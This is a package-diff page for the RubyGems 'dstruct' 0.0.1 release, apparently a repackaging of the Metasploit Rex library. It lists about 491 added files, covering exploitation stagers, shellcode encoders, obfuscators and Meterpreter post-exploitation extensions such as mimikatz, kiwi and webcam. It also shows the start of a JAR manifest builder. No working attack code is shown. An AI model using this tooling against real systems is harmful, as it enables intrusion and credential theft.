RubyGems - dstruct - Versions diffs - 0.0.1 - Mend

dstruct 0.0.1

Files changed (491) hide show

checksums.yaml +15 -0
data/README.markdown +23 -0
data/examples/smb_example.rb +35 -0
data/lib/rex.rb +108 -0
data/lib/rex/LICENSE +29 -0
data/lib/rex/arch.rb +104 -0
data/lib/rex/arch/sparc.rb +75 -0
data/lib/rex/arch/x86.rb +524 -0
data/lib/rex/assembly/nasm.rb +104 -0
data/lib/rex/codepage.map +104 -0
data/lib/rex/compat.rb +389 -0
data/lib/rex/constants.rb +124 -0
data/lib/rex/elfparsey.rb +9 -0
data/lib/rex/elfparsey/elf.rb +121 -0
data/lib/rex/elfparsey/elfbase.rb +256 -0
data/lib/rex/elfparsey/exceptions.rb +25 -0
data/lib/rex/elfscan.rb +10 -0
data/lib/rex/elfscan/scanner.rb +226 -0
data/lib/rex/elfscan/search.rb +44 -0
data/lib/rex/encoder/alpha2.rb +31 -0
data/lib/rex/encoder/alpha2/alpha_mixed.rb +68 -0
data/lib/rex/encoder/alpha2/alpha_upper.rb +79 -0
data/lib/rex/encoder/alpha2/generic.rb +90 -0
data/lib/rex/encoder/alpha2/unicode_mixed.rb +116 -0
data/lib/rex/encoder/alpha2/unicode_upper.rb +123 -0
data/lib/rex/encoder/bloxor/bloxor.rb +327 -0
data/lib/rex/encoder/ndr.rb +90 -0
data/lib/rex/encoder/nonalpha.rb +61 -0
data/lib/rex/encoder/nonupper.rb +64 -0
data/lib/rex/encoder/xdr.rb +107 -0
data/lib/rex/encoder/xor.rb +69 -0
data/lib/rex/encoder/xor/dword.rb +13 -0
data/lib/rex/encoder/xor/dword_additive.rb +13 -0
data/lib/rex/encoders/xor_dword.rb +35 -0
data/lib/rex/encoders/xor_dword_additive.rb +53 -0
data/lib/rex/encoding/xor.rb +20 -0
data/lib/rex/encoding/xor/byte.rb +15 -0
data/lib/rex/encoding/xor/dword.rb +21 -0
data/lib/rex/encoding/xor/dword_additive.rb +92 -0
data/lib/rex/encoding/xor/exceptions.rb +17 -0
data/lib/rex/encoding/xor/generic.rb +146 -0
data/lib/rex/encoding/xor/qword.rb +15 -0
data/lib/rex/encoding/xor/word.rb +21 -0
data/lib/rex/exceptions.rb +275 -0
data/lib/rex/exploitation/cmdstager.rb +10 -0
data/lib/rex/exploitation/cmdstager/base.rb +190 -0
data/lib/rex/exploitation/cmdstager/bourne.rb +105 -0
data/lib/rex/exploitation/cmdstager/debug_asm.rb +140 -0
data/lib/rex/exploitation/cmdstager/debug_write.rb +134 -0
data/lib/rex/exploitation/cmdstager/echo.rb +164 -0
data/lib/rex/exploitation/cmdstager/printf.rb +122 -0
data/lib/rex/exploitation/cmdstager/tftp.rb +71 -0
data/lib/rex/exploitation/cmdstager/vbs.rb +126 -0
data/lib/rex/exploitation/egghunter.rb +425 -0
data/lib/rex/exploitation/encryptjs.rb +78 -0
data/lib/rex/exploitation/heaplib.js.b64 +331 -0
data/lib/rex/exploitation/heaplib.rb +107 -0
data/lib/rex/exploitation/js.rb +6 -0
data/lib/rex/exploitation/js/detect.rb +69 -0
data/lib/rex/exploitation/js/memory.rb +81 -0
data/lib/rex/exploitation/js/network.rb +84 -0
data/lib/rex/exploitation/js/utils.rb +33 -0
data/lib/rex/exploitation/jsobfu.rb +513 -0
data/lib/rex/exploitation/obfuscatejs.rb +336 -0
data/lib/rex/exploitation/omelet.rb +321 -0
data/lib/rex/exploitation/opcodedb.rb +819 -0
data/lib/rex/exploitation/powershell.rb +62 -0
data/lib/rex/exploitation/powershell/function.rb +63 -0
data/lib/rex/exploitation/powershell/obfu.rb +98 -0
data/lib/rex/exploitation/powershell/output.rb +151 -0
data/lib/rex/exploitation/powershell/param.rb +23 -0
data/lib/rex/exploitation/powershell/parser.rb +183 -0
data/lib/rex/exploitation/powershell/psh_methods.rb +70 -0
data/lib/rex/exploitation/powershell/script.rb +99 -0
data/lib/rex/exploitation/ropdb.rb +190 -0
data/lib/rex/exploitation/seh.rb +93 -0
data/lib/rex/file.rb +160 -0
data/lib/rex/image_source.rb +10 -0
data/lib/rex/image_source/disk.rb +58 -0
data/lib/rex/image_source/image_source.rb +44 -0
data/lib/rex/image_source/memory.rb +35 -0
data/lib/rex/io/bidirectional_pipe.rb +161 -0
data/lib/rex/io/datagram_abstraction.rb +35 -0
data/lib/rex/io/ring_buffer.rb +369 -0
data/lib/rex/io/stream.rb +312 -0
data/lib/rex/io/stream_abstraction.rb +209 -0
data/lib/rex/io/stream_server.rb +221 -0
data/lib/rex/job_container.rb +200 -0
data/lib/rex/logging.rb +4 -0
data/lib/rex/logging/log_dispatcher.rb +180 -0
data/lib/rex/logging/log_sink.rb +43 -0
data/lib/rex/logging/sinks/flatfile.rb +56 -0
data/lib/rex/logging/sinks/stderr.rb +44 -0
data/lib/rex/mac_oui.rb +16581 -0
data/lib/rex/machparsey.rb +9 -0
data/lib/rex/machparsey/exceptions.rb +34 -0
data/lib/rex/machparsey/mach.rb +209 -0
data/lib/rex/machparsey/machbase.rb +408 -0
data/lib/rex/machscan.rb +9 -0
data/lib/rex/machscan/scanner.rb +217 -0
data/lib/rex/mime.rb +10 -0
data/lib/rex/mime/encoding.rb +17 -0
data/lib/rex/mime/header.rb +78 -0
data/lib/rex/mime/message.rb +150 -0
data/lib/rex/mime/part.rb +50 -0
data/lib/rex/nop/opty2.rb +109 -0
data/lib/rex/nop/opty2_tables.rb +301 -0
data/lib/rex/ole.rb +202 -0
data/lib/rex/ole/clsid.rb +44 -0
data/lib/rex/ole/difat.rb +138 -0
data/lib/rex/ole/directory.rb +228 -0
data/lib/rex/ole/direntry.rb +237 -0
data/lib/rex/ole/docs/dependencies.txt +8 -0
data/lib/rex/ole/docs/references.txt +1 -0
data/lib/rex/ole/fat.rb +96 -0
data/lib/rex/ole/header.rb +201 -0
data/lib/rex/ole/minifat.rb +74 -0
data/lib/rex/ole/propset.rb +141 -0
data/lib/rex/ole/samples/create_ole.rb +27 -0
data/lib/rex/ole/samples/dir.rb +35 -0
data/lib/rex/ole/samples/dump_stream.rb +34 -0
data/lib/rex/ole/samples/ole_info.rb +23 -0
data/lib/rex/ole/storage.rb +392 -0
data/lib/rex/ole/stream.rb +50 -0
data/lib/rex/ole/substorage.rb +46 -0
data/lib/rex/ole/util.rb +154 -0
data/lib/rex/parser/acunetix_nokogiri.rb +406 -0
data/lib/rex/parser/apple_backup_manifestdb.rb +132 -0
data/lib/rex/parser/appscan_nokogiri.rb +367 -0
data/lib/rex/parser/arguments.rb +108 -0
data/lib/rex/parser/burp_session_nokogiri.rb +291 -0
data/lib/rex/parser/ci_nokogiri.rb +193 -0
data/lib/rex/parser/foundstone_nokogiri.rb +342 -0
data/lib/rex/parser/fusionvm_nokogiri.rb +109 -0
data/lib/rex/parser/group_policy_preferences.rb +185 -0
data/lib/rex/parser/ini.rb +186 -0
data/lib/rex/parser/ip360_aspl_xml.rb +103 -0
data/lib/rex/parser/ip360_xml.rb +98 -0
data/lib/rex/parser/mbsa_nokogiri.rb +256 -0
data/lib/rex/parser/nessus_xml.rb +121 -0
data/lib/rex/parser/netsparker_xml.rb +109 -0
data/lib/rex/parser/nexpose_raw_nokogiri.rb +686 -0
data/lib/rex/parser/nexpose_simple_nokogiri.rb +330 -0
data/lib/rex/parser/nexpose_xml.rb +172 -0
data/lib/rex/parser/nmap_nokogiri.rb +394 -0
data/lib/rex/parser/nmap_xml.rb +166 -0
data/lib/rex/parser/nokogiri_doc_mixin.rb +233 -0
data/lib/rex/parser/openvas_nokogiri.rb +172 -0
data/lib/rex/parser/outpost24_nokogiri.rb +240 -0
data/lib/rex/parser/retina_xml.rb +110 -0
data/lib/rex/parser/unattend.rb +171 -0
data/lib/rex/parser/wapiti_nokogiri.rb +105 -0
data/lib/rex/payloads.rb +2 -0
data/lib/rex/payloads/win32.rb +3 -0
data/lib/rex/payloads/win32/common.rb +27 -0
data/lib/rex/payloads/win32/kernel.rb +54 -0
data/lib/rex/payloads/win32/kernel/common.rb +55 -0
data/lib/rex/payloads/win32/kernel/migration.rb +13 -0
data/lib/rex/payloads/win32/kernel/recovery.rb +51 -0
data/lib/rex/payloads/win32/kernel/stager.rb +195 -0
data/lib/rex/peparsey.rb +10 -0
data/lib/rex/peparsey/exceptions.rb +30 -0
data/lib/rex/peparsey/pe.rb +210 -0
data/lib/rex/peparsey/pe_memdump.rb +61 -0
data/lib/rex/peparsey/pebase.rb +1662 -0
data/lib/rex/peparsey/section.rb +128 -0
data/lib/rex/pescan.rb +11 -0
data/lib/rex/pescan/analyze.rb +366 -0
data/lib/rex/pescan/scanner.rb +230 -0
data/lib/rex/pescan/search.rb +68 -0
data/lib/rex/platforms.rb +2 -0
data/lib/rex/platforms/windows.rb +52 -0
data/lib/rex/poly.rb +134 -0
data/lib/rex/poly/block.rb +480 -0
data/lib/rex/poly/machine.rb +13 -0
data/lib/rex/poly/machine/machine.rb +830 -0
data/lib/rex/poly/machine/x86.rb +509 -0
data/lib/rex/poly/register.rb +101 -0
data/lib/rex/poly/register/x86.rb +41 -0
data/lib/rex/post.rb +7 -0
data/lib/rex/post/dir.rb +51 -0
data/lib/rex/post/file.rb +172 -0
data/lib/rex/post/file_stat.rb +220 -0
data/lib/rex/post/gen.pl +13 -0
data/lib/rex/post/io.rb +182 -0
data/lib/rex/post/meterpreter.rb +5 -0
data/lib/rex/post/meterpreter/channel.rb +446 -0
data/lib/rex/post/meterpreter/channel_container.rb +54 -0
data/lib/rex/post/meterpreter/channels/pool.rb +160 -0
data/lib/rex/post/meterpreter/channels/pools/file.rb +62 -0
data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +103 -0
data/lib/rex/post/meterpreter/channels/stream.rb +87 -0
data/lib/rex/post/meterpreter/client.rb +483 -0
data/lib/rex/post/meterpreter/client_core.rb +352 -0
data/lib/rex/post/meterpreter/dependencies.rb +3 -0
data/lib/rex/post/meterpreter/extension.rb +32 -0
data/lib/rex/post/meterpreter/extensions/android/android.rb +128 -0
data/lib/rex/post/meterpreter/extensions/android/tlv.rb +40 -0
data/lib/rex/post/meterpreter/extensions/espia/espia.rb +58 -0
data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +17 -0
data/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb +71 -0
data/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb +169 -0
data/lib/rex/post/meterpreter/extensions/extapi/extapi.rb +45 -0
data/lib/rex/post/meterpreter/extensions/extapi/service/service.rb +104 -0
data/lib/rex/post/meterpreter/extensions/extapi/tlv.rb +77 -0
data/lib/rex/post/meterpreter/extensions/extapi/window/window.rb +56 -0
data/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb +75 -0
data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +94 -0
data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +22 -0
data/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +361 -0
data/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +76 -0
data/lib/rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp.rb +78 -0
data/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb +43 -0
data/lib/rex/post/meterpreter/extensions/lanattacks/tftp/tftp.rb +49 -0
data/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb +17 -0
data/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb +128 -0
data/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb +16 -0
data/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +57 -0
data/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +16 -0
data/lib/rex/post/meterpreter/extensions/priv/fs.rb +118 -0
data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +61 -0
data/lib/rex/post/meterpreter/extensions/priv/priv.rb +109 -0
data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +29 -0
data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +117 -0
data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +27 -0
data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +396 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +284 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +399 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +104 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +48 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/arp.rb +59 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +256 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +129 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/netstat.rb +97 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/resolve.rb +106 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +67 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +139 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +180 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +168 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +209 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb +38146 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb +48 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +2102 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_crypt32.rb +32 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb +97 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +3852 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +100 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb +168 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_psapi.rb +32 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb +32 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb +3170 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_version.rb +41 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wlanapi.rb +87 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb +128 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +613 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb +388 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb +111 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb +149 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb +27 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/mock_magic.rb +515 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb +319 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb +23 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +301 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb +56 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb +106 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb +676 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb +96 -0
data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +151 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +128 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +192 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +41 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +60 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +408 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +129 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +55 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +336 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +141 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +328 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +193 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +102 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb +188 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +180 -0
data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +236 -0
data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +259 -0
data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +201 -0
data/lib/rex/post/meterpreter/inbound_packet_handler.rb +30 -0
data/lib/rex/post/meterpreter/object_aliases.rb +83 -0
data/lib/rex/post/meterpreter/packet.rb +709 -0
data/lib/rex/post/meterpreter/packet_dispatcher.rb +543 -0
data/lib/rex/post/meterpreter/packet_parser.rb +94 -0
data/lib/rex/post/meterpreter/packet_response_waiter.rb +83 -0
data/lib/rex/post/meterpreter/ui/console.rb +142 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +86 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +383 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +939 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +109 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb +65 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb +198 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb +444 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb +199 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb +118 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb +108 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +242 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +509 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks.rb +60 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb +254 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb +159 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb +182 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +232 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +62 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +97 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +52 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +133 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +204 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +66 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +527 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +448 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +906 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +318 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +343 -0
data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +99 -0
data/lib/rex/post/permission.rb +26 -0
data/lib/rex/post/process.rb +57 -0
data/lib/rex/post/thread.rb +57 -0
data/lib/rex/post/ui.rb +52 -0
data/lib/rex/proto.rb +15 -0
data/lib/rex/proto/addp.rb +218 -0
data/lib/rex/proto/dcerpc.rb +7 -0
data/lib/rex/proto/dcerpc/client.rb +362 -0
data/lib/rex/proto/dcerpc/exceptions.rb +151 -0
data/lib/rex/proto/dcerpc/handle.rb +48 -0
data/lib/rex/proto/dcerpc/ndr.rb +73 -0
data/lib/rex/proto/dcerpc/packet.rb +264 -0
data/lib/rex/proto/dcerpc/response.rb +188 -0
data/lib/rex/proto/dcerpc/uuid.rb +85 -0
data/lib/rex/proto/dcerpc/wdscp.rb +3 -0
data/lib/rex/proto/dcerpc/wdscp/constants.rb +89 -0
data/lib/rex/proto/dcerpc/wdscp/packet.rb +94 -0
data/lib/rex/proto/dhcp.rb +7 -0
data/lib/rex/proto/dhcp/constants.rb +34 -0
data/lib/rex/proto/dhcp/server.rb +334 -0
data/lib/rex/proto/drda.rb +6 -0
data/lib/rex/proto/drda/constants.rb +50 -0
data/lib/rex/proto/drda/packet.rb +253 -0
data/lib/rex/proto/drda/utils.rb +124 -0
data/lib/rex/proto/http.rb +7 -0
data/lib/rex/proto/http/client.rb +722 -0
data/lib/rex/proto/http/client_request.rb +472 -0
data/lib/rex/proto/http/handler.rb +47 -0
data/lib/rex/proto/http/handler/erb.rb +129 -0
data/lib/rex/proto/http/handler/proc.rb +61 -0
data/lib/rex/proto/http/header.rb +173 -0
data/lib/rex/proto/http/packet.rb +414 -0
data/lib/rex/proto/http/request.rb +354 -0
data/lib/rex/proto/http/response.rb +151 -0
data/lib/rex/proto/http/server.rb +385 -0
data/lib/rex/proto/iax2.rb +2 -0
data/lib/rex/proto/iax2/call.rb +326 -0
data/lib/rex/proto/iax2/client.rb +218 -0
data/lib/rex/proto/iax2/codecs.rb +5 -0
data/lib/rex/proto/iax2/codecs/alaw.rb +16 -0
data/lib/rex/proto/iax2/codecs/g711.rb +2176 -0
data/lib/rex/proto/iax2/codecs/mulaw.rb +17 -0
data/lib/rex/proto/iax2/constants.rb +262 -0
data/lib/rex/proto/ipmi.rb +57 -0
data/lib/rex/proto/ipmi/channel_auth_reply.rb +89 -0
data/lib/rex/proto/ipmi/open_session_reply.rb +36 -0
data/lib/rex/proto/ipmi/rakp2.rb +36 -0
data/lib/rex/proto/ipmi/utils.rb +125 -0
data/lib/rex/proto/natpmp.rb +7 -0
data/lib/rex/proto/natpmp/constants.rb +19 -0
data/lib/rex/proto/natpmp/packet.rb +45 -0
data/lib/rex/proto/ntlm.rb +8 -0
data/lib/rex/proto/ntlm/base.rb +327 -0
data/lib/rex/proto/ntlm/constants.rb +75 -0
data/lib/rex/proto/ntlm/crypt.rb +412 -0
data/lib/rex/proto/ntlm/exceptions.rb +17 -0
data/lib/rex/proto/ntlm/message.rb +534 -0
data/lib/rex/proto/ntlm/utils.rb +765 -0
data/lib/rex/proto/ntp.rb +3 -0
data/lib/rex/proto/ntp/constants.rb +12 -0
data/lib/rex/proto/ntp/modes.rb +130 -0
data/lib/rex/proto/pjl.rb +31 -0
data/lib/rex/proto/pjl/client.rb +163 -0
data/lib/rex/proto/proxy/socks4a.rb +441 -0
data/lib/rex/proto/rfb.rb +13 -0
data/lib/rex/proto/rfb/cipher.rb +82 -0
data/lib/rex/proto/rfb/client.rb +205 -0
data/lib/rex/proto/rfb/constants.rb +50 -0
data/lib/rex/proto/sip.rb +4 -0
data/lib/rex/proto/sip/response.rb +61 -0
data/lib/rex/proto/smb.rb +8 -0
data/lib/rex/proto/smb/client.rb +2064 -0
data/lib/rex/proto/smb/constants.rb +1064 -0
data/lib/rex/proto/smb/crypt.rb +37 -0
data/lib/rex/proto/smb/evasions.rb +67 -0
data/lib/rex/proto/smb/exceptions.rb +867 -0
data/lib/rex/proto/smb/simpleclient.rb +173 -0
data/lib/rex/proto/smb/simpleclient/open_file.rb +106 -0
data/lib/rex/proto/smb/simpleclient/open_pipe.rb +57 -0
data/lib/rex/proto/smb/utils.rb +104 -0
data/lib/rex/proto/sunrpc.rb +2 -0
data/lib/rex/proto/sunrpc/client.rb +196 -0
data/lib/rex/proto/tftp.rb +13 -0
data/lib/rex/proto/tftp/client.rb +344 -0
data/lib/rex/proto/tftp/constants.rb +39 -0
data/lib/rex/proto/tftp/server.rb +497 -0
data/lib/rex/random_identifier_generator.rb +177 -0
data/lib/rex/registry.rb +14 -0
data/lib/rex/registry/hive.rb +132 -0
data/lib/rex/registry/lfkey.rb +51 -0
data/lib/rex/registry/nodekey.rb +54 -0
data/lib/rex/registry/regf.rb +25 -0
data/lib/rex/registry/valuekey.rb +67 -0
data/lib/rex/registry/valuelist.rb +29 -0
data/lib/rex/ropbuilder.rb +8 -0
data/lib/rex/ropbuilder/rop.rb +271 -0
data/lib/rex/script.rb +42 -0
data/lib/rex/script/base.rb +61 -0
data/lib/rex/script/meterpreter.rb +16 -0
data/lib/rex/script/shell.rb +10 -0
data/lib/rex/service.rb +49 -0
data/lib/rex/service_manager.rb +154 -0
data/lib/rex/services/local_relay.rb +424 -0
data/lib/rex/socket.rb +788 -0
data/lib/rex/socket/comm.rb +120 -0
data/lib/rex/socket/comm/local.rb +526 -0
data/lib/rex/socket/ip.rb +132 -0
data/lib/rex/socket/parameters.rb +363 -0
data/lib/rex/socket/range_walker.rb +470 -0
data/lib/rex/socket/ssl_tcp.rb +345 -0
data/lib/rex/socket/ssl_tcp_server.rb +188 -0
data/lib/rex/socket/subnet_walker.rb +76 -0
data/lib/rex/socket/switch_board.rb +289 -0
data/lib/rex/socket/tcp.rb +79 -0
data/lib/rex/socket/tcp_server.rb +67 -0
data/lib/rex/socket/udp.rb +165 -0
data/lib/rex/sslscan/result.rb +201 -0
data/lib/rex/sslscan/scanner.rb +206 -0
data/lib/rex/struct2.rb +5 -0
data/lib/rex/struct2/c_struct.rb +181 -0
data/lib/rex/struct2/c_struct_template.rb +39 -0
data/lib/rex/struct2/constant.rb +26 -0
data/lib/rex/struct2/element.rb +44 -0
data/lib/rex/struct2/generic.rb +73 -0
data/lib/rex/struct2/restraint.rb +54 -0
data/lib/rex/struct2/s_string.rb +72 -0
data/lib/rex/struct2/s_struct.rb +111 -0
data/lib/rex/sync.rb +6 -0
data/lib/rex/sync/event.rb +85 -0
data/lib/rex/sync/read_write_lock.rb +177 -0
data/lib/rex/sync/ref.rb +58 -0
data/lib/rex/sync/thread_safe.rb +83 -0
data/lib/rex/text.rb +1813 -0
data/lib/rex/thread_factory.rb +43 -0
data/lib/rex/time.rb +66 -0
data/lib/rex/transformer.rb +116 -0
data/lib/rex/ui.rb +22 -0
data/lib/rex/ui/interactive.rb +304 -0
data/lib/rex/ui/output.rb +85 -0
data/lib/rex/ui/output/none.rb +19 -0
data/lib/rex/ui/progress_tracker.rb +97 -0
data/lib/rex/ui/subscriber.rb +160 -0
data/lib/rex/ui/text/color.rb +98 -0
data/lib/rex/ui/text/dispatcher_shell.rb +538 -0
data/lib/rex/ui/text/input.rb +119 -0
data/lib/rex/ui/text/input/buffer.rb +79 -0
data/lib/rex/ui/text/input/readline.rb +129 -0
data/lib/rex/ui/text/input/socket.rb +96 -0
data/lib/rex/ui/text/input/stdio.rb +46 -0
data/lib/rex/ui/text/irb_shell.rb +62 -0
data/lib/rex/ui/text/output.rb +86 -0
data/lib/rex/ui/text/output/buffer.rb +62 -0
data/lib/rex/ui/text/output/buffer/stdout.rb +26 -0
data/lib/rex/ui/text/output/file.rb +44 -0
data/lib/rex/ui/text/output/socket.rb +44 -0
data/lib/rex/ui/text/output/stdio.rb +53 -0
data/lib/rex/ui/text/output/tee.rb +56 -0
data/lib/rex/ui/text/progress_tracker.rb +57 -0
data/lib/rex/ui/text/shell.rb +403 -0
data/lib/rex/ui/text/table.rb +346 -0
data/lib/rex/zip.rb +96 -0
data/lib/rex/zip/archive.rb +130 -0
data/lib/rex/zip/blocks.rb +184 -0
data/lib/rex/zip/entry.rb +122 -0
data/lib/rex/zip/jar.rb +283 -0
data/lib/rex/zip/samples/comment.rb +32 -0
data/lib/rex/zip/samples/mkwar.rb +138 -0
data/lib/rex/zip/samples/mkzip.rb +19 -0
data/lib/rex/zip/samples/recursive.rb +58 -0
metadata +536 -0

@@ -0,0 +1,283 @@
+# -*- coding: binary -*-
+require 'rex/zip/archive'
+module Rex
+module Zip
+#
+# A Jar is a zip archive containing Java class files and a MANIFEST.MF listing
+# those classes.  Several variations exist based on the same idea of class
+# files inside a zip, most notably:
+# - WAR files store XML files, Java classes, JSPs and other stuff for
+#   servlet-based webservers (e.g.: Tomcat and Glassfish)
+# - APK files are Android Package files
+#
+class Jar < Archive
+  attr_accessor :manifest
+  # @!attribute [rw] substitutions
+  #   The substitutions to apply when randomizing. Randomization is designed to
+  #   be used in packages and/or classes names.
+  #
+  #   @return [Hash]
+  attr_accessor :substitutions
+  def initialize
+    @substitutions = {}
+    super
+  end
+  #
+  # Create a MANIFEST.MF file based on the current Archive#entries.
+  #
+  # See http://download.oracle.com/javase/1.4.2/docs/guide/jar/jar.html for
+  # some explanation of the format.
+  #
+  # Example MANIFEST.MF
+  #   Manifest-Version: 1.0
+  #   Main-Class: metasploit.Payload
+  #
+  #   Name: metasploit.dat
+  #   SHA1-Digest: WJ7cUVYUryLKfQFmH80/ADfKmwM=
+  #
+  #   Name: metasploit/Payload.class
+  #   SHA1-Digest: KbAIMttBcLp1zCewA2ERYkcnRU8=
+  #
+  # The SHA1-Digest lines are optional unless the jar is signed (see #sign).
+  #
+  def build_manifest(opts={})
+    main_class = (opts[:main_class] ? randomize(opts[:main_class]) : nil)
